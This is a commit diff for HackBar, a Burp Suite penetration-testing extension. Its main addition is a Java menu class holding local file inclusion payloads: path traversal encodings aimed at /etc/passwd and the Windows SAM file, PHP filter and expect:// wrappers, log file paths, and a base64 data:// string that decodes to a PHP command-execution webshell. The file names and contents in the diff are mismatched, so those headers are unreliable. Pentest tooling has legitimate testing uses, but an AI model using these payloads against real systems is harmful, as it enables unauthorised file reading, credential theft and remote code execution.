Offical Release 1.0

Author: d3vilbug

README.md

@@ -39,5 +39,6 @@
 - Mini Webshells
 - Simulate Attack (Automatically test complete cheat sheet with one click)
 
-### Greet
-- An0n 3xPloiTeR https://github.com/Anon-Exploiter/ for SQLi && XSS payloads 
+### Greets
+- An0n 3xPloiTeR https://github.com/Anon-Exploiter/ for SQLi && XSS payloads 
+- PayloadsAllTheThings https://github.com/swisskyrepo/PayloadsAllTheThings/

build/built-jar.properties

@@ -1,4 +1,4 @@
-#Sat, 08 Sep 2018 01:56:29 +0500
-
-
-C\:\\Users\\bugzy\\Documents\\NetBeansProjects\\Burp_Plugins\\HackBar=
+#Fri, 21 Sep 2018 19:14:15 +0500
+
+
+/mnt/0C54773E54772A1A/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/HackBar=

build/classes/burp/BurpExtender.class

@@ -29,4 +29,4 @@ the projects runtime path.
 * To set a main class in a standard Java project, right-click the project node
 in the Projects window and choose Properties. Then click Run and enter the
 class name in the Main Class field. Alternatively, you can manually type the
-class name in the manifest Main-Class element.
+class name in the manifest Main-Class element.

build/classes/burp/SQL_Menu.class

@@ -1,2 +1,6 @@
-compile.on.save=true
-user.properties.file=C:\\Users\\bugzy\\AppData\\Roaming\\NetBeans\\8.0.2\\build.properties
+compile.on.save=true
+do.depend=false
+do.jar=true
+javac.debug=true
+javadoc.preview=true
+user.properties.file=/home/bugzy/.netbeans/8.0.2/build.properties

build/classes/burp/XSS_Menu.class

@@ -1,12 +1,9 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<project-private xmlns="http://www.netbeans.org/ns/project-private/1">
-    <editor-bookmarks xmlns="http://www.netbeans.org/ns/editor-bookmarks/2" lastBookmarkId="0"/>
-    <open-files xmlns="http://www.netbeans.org/ns/projectui-open-files/2">
-        <group>
-            <file>file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/HackBar/src/burp/Methods.java</file>
-            <file>file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/HackBar/src/burp/SQli_LoginBypass.java</file>
-            <file>file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/HackBar/src/burp/SQL_Menu.java</file>
-            <file>file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/HackBar/src/burp/BurpExtender.java</file>
-        </group>
-    </open-files>
-</project-private>
+<?xml version="1.0" encoding="UTF-8"?>
+<project-private xmlns="http://www.netbeans.org/ns/project-private/1">
+    <editor-bookmarks xmlns="http://www.netbeans.org/ns/editor-bookmarks/2" lastBookmarkId="0"/>
+    <open-files xmlns="http://www.netbeans.org/ns/projectui-open-files/2">
+        <group>
+            <file>file:/mnt/0C54773E54772A1A/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/HackBar/src/burp/XSS_Menu.java</file>
+        </group>
+    </open-files>
+</project-private>

dist/README.TXT

@@ -1,73 +1,75 @@
-annotation.processing.enabled=true
-annotation.processing.enabled.in.editor=false
-annotation.processing.processor.options=
-annotation.processing.processors.list=
-annotation.processing.run.all.processors=true
-annotation.processing.source.output=${build.generated.sources.dir}/ap-source-output
-build.classes.dir=${build.dir}/classes
-build.classes.excludes=**/*.java,**/*.form
-# This directory is removed when the project is cleaned:
-build.dir=build
-build.generated.dir=${build.dir}/generated
-build.generated.sources.dir=${build.dir}/generated-sources
-# Only compile against the classpath explicitly listed here:
-build.sysclasspath=ignore
-build.test.classes.dir=${build.dir}/test/classes
-build.test.results.dir=${build.dir}/test/results
-# Uncomment to specify the preferred debugger connection transport:
-#debug.transport=dt_socket
-debug.classpath=\
-    ${run.classpath}
-debug.test.classpath=\
-    ${run.test.classpath}
-# Files in build.classes.dir which should be excluded from distribution jar
-dist.archive.excludes=
-# This directory is removed when the project is cleaned:
-dist.dir=dist
-dist.jar=${dist.dir}/HackBar.jar
-dist.javadoc.dir=${dist.dir}/javadoc
-excludes=
-includes=**
-jar.compress=false
-javac.classpath=
-# Space-separated list of extra javac options
-javac.compilerargs=
-javac.deprecation=false
-javac.processorpath=\
-    ${javac.classpath}
-javac.source=1.8
-javac.target=1.8
-javac.test.classpath=\
-    ${javac.classpath}:\
-    ${build.classes.dir}
-javac.test.processorpath=\
-    ${javac.test.classpath}
-javadoc.additionalparam=
-javadoc.author=false
-javadoc.encoding=${source.encoding}
-javadoc.noindex=false
-javadoc.nonavbar=false
-javadoc.notree=false
-javadoc.private=false
-javadoc.splitindex=true
-javadoc.use=true
-javadoc.version=false
-javadoc.windowtitle=
-main.class=
-manifest.file=manifest.mf
-meta.inf.dir=${src.dir}/META-INF
-mkdist.disabled=false
-platform.active=default_platform
-run.classpath=\
-    ${javac.classpath}:\
-    ${build.classes.dir}
-# Space-separated list of JVM arguments used when running the project.
-# You may also define separate properties like run-sys-prop.name=value instead of -Dname=value.
-# To set system properties for unit tests define test-sys-prop.name=value:
-run.jvmargs=
-run.test.classpath=\
-    ${javac.test.classpath}:\
-    ${build.test.classes.dir}
-source.encoding=UTF-8
-src.dir=src
-test.src.dir=test
+annotation.processing.enabled=true
+annotation.processing.enabled.in.editor=false
+annotation.processing.processors.list=
+annotation.processing.run.all.processors=true
+annotation.processing.source.output=${build.generated.sources.dir}/ap-source-output
+application.title=HackBar
+application.vendor=bugzy
+build.classes.dir=${build.dir}/classes
+build.classes.excludes=**/*.java,**/*.form
+# This directory is removed when the project is cleaned:
+build.dir=build
+build.generated.dir=${build.dir}/generated
+build.generated.sources.dir=${build.dir}/generated-sources
+# Only compile against the classpath explicitly listed here:
+build.sysclasspath=ignore
+build.test.classes.dir=${build.dir}/test/classes
+build.test.results.dir=${build.dir}/test/results
+# Uncomment to specify the preferred debugger connection transport:
+#debug.transport=dt_socket
+debug.classpath=\
+    ${run.classpath}
+debug.test.classpath=\
+    ${run.test.classpath}
+# Files in build.classes.dir which should be excluded from distribution jar
+dist.archive.excludes=
+# This directory is removed when the project is cleaned:
+dist.dir=dist
+dist.jar=${dist.dir}/HackBar.jar
+dist.javadoc.dir=${dist.dir}/javadoc
+endorsed.classpath=
+excludes=
+includes=**
+jar.compress=true
+javac.classpath=
+# Space-separated list of extra javac options
+javac.compilerargs=
+javac.deprecation=false
+javac.processorpath=\
+    ${javac.classpath}
+javac.source=1.8
+javac.target=1.8
+javac.test.classpath=\
+    ${javac.classpath}:\
+    ${build.classes.dir}
+javac.test.processorpath=\
+    ${javac.test.classpath}
+javadoc.additionalparam=
+javadoc.author=false
+javadoc.encoding=${source.encoding}
+javadoc.noindex=false
+javadoc.nonavbar=false
+javadoc.notree=false
+javadoc.private=false
+javadoc.splitindex=true
+javadoc.use=true
+javadoc.version=false
+javadoc.windowtitle=
+main.class=
+manifest.file=manifest.mf
+meta.inf.dir=${src.dir}/META-INF
+mkdist.disabled=false
+platform.active=default_platform
+run.classpath=\
+    ${javac.classpath}:\
+    ${build.classes.dir}
+# Space-separated list of JVM arguments used when running the project.
+# You may also define separate properties like run-sys-prop.name=value instead of -Dname=value.
+# To set system properties for unit tests define test-sys-prop.name=value:
+run.jvmargs=
+run.test.classpath=\
+    ${javac.test.classpath}:\
+    ${build.test.classes.dir}
+source.encoding=UTF-8
+src.dir=src
+test.src.dir=test

nbproject/private/private.properties

@@ -37,14 +37,14 @@ public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) {
         this.menu_list = new ArrayList();
         this.Hack_Bar_Menu = new JMenu(this.MenuName);
         this.Hack_Bar_Menu.add(new SQL_Menu(this));
+        this.Hack_Bar_Menu.add(new SQL_Error(this));
         this.Hack_Bar_Menu.add(new SQli_LoginBypass(this));
         this.Hack_Bar_Menu.add(new XSS_Menu(this));
         this.Hack_Bar_Menu.add(new LFI_Menu(this));
         this.Hack_Bar_Menu.add(new XXE_Menu(this));
-        this.Hack_Bar_Menu.add(new RCE_Menu(this));
         this.Hack_Bar_Menu.add(new WebShell_Menu(this));
         this.Hack_Bar_Menu.add(new Reverse_Shell_Menu(this));
-        this.Hack_Bar_Menu.add(new Decoder_Encoder_Menu(this));
+//        this.Hack_Bar_Menu.add(new Decoder_Encoder_Menu(this));
 
 
         this.callbacks.setExtensionName(this.ExtensionName);

nbproject/private/private.xml

@@ -5,6 +5,9 @@
  */
 package burp;
 
+import java.awt.event.ActionEvent;
+import java.awt.event.ActionListener;
+import java.util.Arrays;
 import javax.swing.JMenu;
 
 /**
@@ -13,12 +16,66 @@
  */
 public class LFI_Menu extends JMenu {
     public BurpExtender myburp;
+    public String[] LFI_Menu = {"Simple Check", "Path Traversal", "Wrapper", "/proc", "Log Files", "Windows File"};
+    public String LFIMenuItems[][] = {
+        {"/etc/passwd", "/etc/passwd%00", "etc%2fpasswd", "etc%2fpasswd%00", "etc%5cpasswd", "etc%5cpasswd%00", "etc%c0%afpasswd", "etc%c0%afpasswd%00", "../../../etc/passwd", "../../../etc/passwd%00", "%252e%252e%252fetc%252fpasswd", "%252e%252e%252fetc%252fpasswd%00", "../../../../../../../../../etc/passwd..\\.\\.\\.\\.\\.\\.\\.\\.", "../../../../[…]../../../../../etc/passwd", "....//....//etc/passwd", "..///////..////..//////etc/passwd", "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd","C:\\boot.ini", "C:\\WINDOWS\\win.ini"},
+        {"../", "..%2f", "%2e%2e/", "%2e%2e%2f", "..%252f", "%252e%252e/", "%252e%252e%252f", "..\\", "..%255c", "..%5c..%5c", "%2e%2e\\", "%2e%2e%5c", "%252e%252e\\", "%252e%252e%255c", "..%c0%af", "%c0%ae%c0%ae/", "%c0%ae%c0%ae%c0%af", "..%25c0%25af", "..%c1%9c"},
+        {"expect://id","expect://ls","php://input","php://filter/read=string.rot13/resource=index.php","php://filter/convert.base64-encode/resource=index.php","pHp://FilTer/convert.base64-encode/resource=index.php","php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd","data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4="},
+        {"/proc/self/environ", "/proc/self/cmdline", "/proc/self/stat", "/proc/self/status", "/proc/self/fd/0", "/proc/self/fd/1", "/proc/self/fd/2", "/proc/self/fd/3"},
+        {"/var/log/apache/access.log", "/var/log/apache/error.log", "/var/log/vsftpd.log", "/var/log/sshd.log", "/var/log/mail", "/var/log/httpd/error_log", "/usr/local/apache/log/error_log", "/usr/local/apache2/log/error_log", "/var/log/access_log", "/var/log/access.log", "/var/log/error_log", "/var/log/error.log", "/var/log/apache/access_log", "/var/log/apache2/access_log", "/var/log/apache2/error.log", "/var/log/httpd/access_log", "/opt/lampp/logs/access_log", "/opt/lampp/logs/access.log", "/opt/lampp/logs/error_log", "/opt/lampp/logs/error.log"},
+        {"C:\\boot.ini", "C:\\WINDOWS\\win.ini", "C:\\WINDOWS\\php.ini", "C:\\WINDOWS\\System32\\Config\\SAM", "C:\\WINNT\\php.ini", "C:\\xampp\\phpMyAdmin\\config.inc", "C:\\xampp\\phpMyAdmin\\phpinfo.php", "C:\\xampp\\phpmyadmin\\config.inc.php", "C:\\xampp\\apache\\conf\\httpd.conf", "C:\\xampp\\MercuryMail\\mercury.ini", "C:\\xampp\\php\\php.ini", "C:\\xampp\\phpMyAdmin\\config.inc.php", "C:\\xampp\\tomcat\\conf\\tomcat-users.xml", "C:\\xampp\\tomcat\\conf\\web.xml", "C:\\xampp\\sendmail\\sendmail.ini", "C:\\xampp\\webalizer\\webalizer.conf", "C:\\xampp\\webdav\\webdav.txt", "C:\\xampp\\apache\\logs\\error.log", "C:\\xampp\\apache\\logs\\access.log", "C:\\xampp\\FileZillaFTP\\Logs", "C:\\xampp\\FileZillaFTP\\Logs\\error.log", "C:\\xampp\\FileZillaFTP\\Logs\\access.log", "C:\\xampp\\MercuryMail\\LOGS\\error.log", "C:\\xampp\\MercuryMail\\LOGS\\access.log", "C:\\xampp\\mysql\\data\\mysql.err", "C:\\xampp\\sendmail\\sendmail.log"}
+        };
 
     LFI_Menu(BurpExtender burp){
         this.setText("LFI");
         this.myburp = burp;
-        this.Create_LFI_Menu();
+        Methods.Create_Main_Menu(this, LFI_Menu, LFIMenuItems, new LFIItemListener(myburp));
     }
-    
-    public void Create_LFI_Menu(){}
 }
+
+
+
+
+
+class LFIItemListener implements ActionListener {
+
+    BurpExtender myburp;
+    LFIItemListener(BurpExtender burp) {
+        myburp = burp;
+    }
+    
+    @Override
+    public void actionPerformed(ActionEvent e) {
+        int[] selectedIndex = myburp.context.getSelectionBounds();
+        IHttpRequestResponse req = myburp.context.getSelectedMessages()[0];
+        byte[] request = req.getRequest();
+        byte[] param = new byte[selectedIndex[1]-selectedIndex[0]];
+        System.arraycopy(request, selectedIndex[0], param, 0, selectedIndex[1]-selectedIndex[0]);
+        String selectString = new String(param);
+        String action = e.getActionCommand();
+        byte[] newRequest = do_LFI(request, selectString, action, selectedIndex);
+        req.setRequest(newRequest);
+    }
+    
+    public byte[] do_LFI(byte[] request, String selectedString, String action, int[] selectedIndex){
+        if (Arrays.asList("../", "..%2f", "%2e%2e/", "%2e%2e%2f", "..%252f", "%252e%252e/", "%252e%252e%252f", "..\\", "..%255c", "..%5c..%5c", "%2e%2e\\", "%2e%2e%5c", "%252e%252e\\", "%252e%252e%255c", "..%c0%af", "%c0%ae%c0%ae/", "%c0%ae%c0%ae%c0%af", "..%25c0%25af", "..%c1%9c").contains(action)){
+            String str = Methods.prompt_and_validate_input("Enter No. of iteration", null);
+            try{
+                int num = Integer.parseInt(str);
+                for(int i=1; i <= num; i++){
+                    selectedString += action; 
+                }
+                selectedString += "etc/passwd";
+            }catch(NumberFormatException nfe){
+                Methods.show_message("Enter proper interegr value!!!", "Input Not Valid");
+            }
+            
+        }
+        else{
+            selectedString = action;
+        }
+        return Methods.do_modify_request(request, selectedIndex, selectedString);
+    }
+    
+
+}

nbproject/project.properties

@@ -41,6 +41,7 @@ public static JMenu Create_Main_Menu(JMenu MainMenu, String[] MainMenuItems, Str
         return MainMenu;
     }
 
+    
     public static String prompt_and_validate_input(String prompt, String str){
         String user_input = JOptionPane.showInputDialog(prompt, str);
         while(user_input.trim().equals("")){
@@ -57,4 +58,8 @@ public static byte[] do_modify_request(byte[] request, int[] selectedIndex, Stri
         System.arraycopy(request, selectedIndex[1], newRequest, selectedIndex[0]+modString.length, request.length-selectedIndex[1]);
         return newRequest;
     }
+    
+    public static void show_message(String str1, String str2){
+        JOptionPane.showMessageDialog(null, str1, str2, 0);
+    }
 }